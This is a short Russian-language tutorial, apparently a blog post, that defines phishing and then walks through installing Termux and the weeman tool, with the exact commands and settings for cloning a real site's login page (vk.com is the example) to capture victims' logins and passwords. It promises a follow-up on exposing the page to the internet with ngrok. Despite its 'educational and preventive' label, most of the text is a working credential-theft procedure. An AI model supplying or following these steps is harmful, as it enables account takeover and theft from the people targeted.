Создано исключительно для образовательных и предупредительных целей
Фи́шинг — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей — логинам и паролям. Это достигается путём проведения массовых рассылок электронных писем от имени популярных брендов, а также личных сообщений внутри различных сервисов, например, от имени банков или внутри социальных сетей.
Проще говоря человек шлёт ссылку сайта очень похожего на официальный. Жертва вводит свои данные и логин и пароль в кармане у мошенника
Как же он работает?
Устанавливаем Termux из Play Market
Открываем и прописываем:
apt upgrade
apt update
pkg upgrade
apt install git
apt install python2
git clone https://github.com/evait-security/weeman
cd weeman
python2 weeman.py
В появившемся окне вводим:
set url "ссылка на официальный сайт под который вы хотите создать фишинговую страницу, например https://vk.com"
set port "любое 4-х значное число (обычно используют 4040 или 8080)"
set action_url "ссылка на сайт на который перейдет жертва после ввода данных"
run
Теперь при вводе ссылки localhost:8080 в браузер появится фишинговая страница
weeman работает только по локальной то есть только на вашем устройстве. Чтобы это исправить нужно установить такую программу ngrok. Как это делать я расскажу в следующей статье. До новых встреч друзья!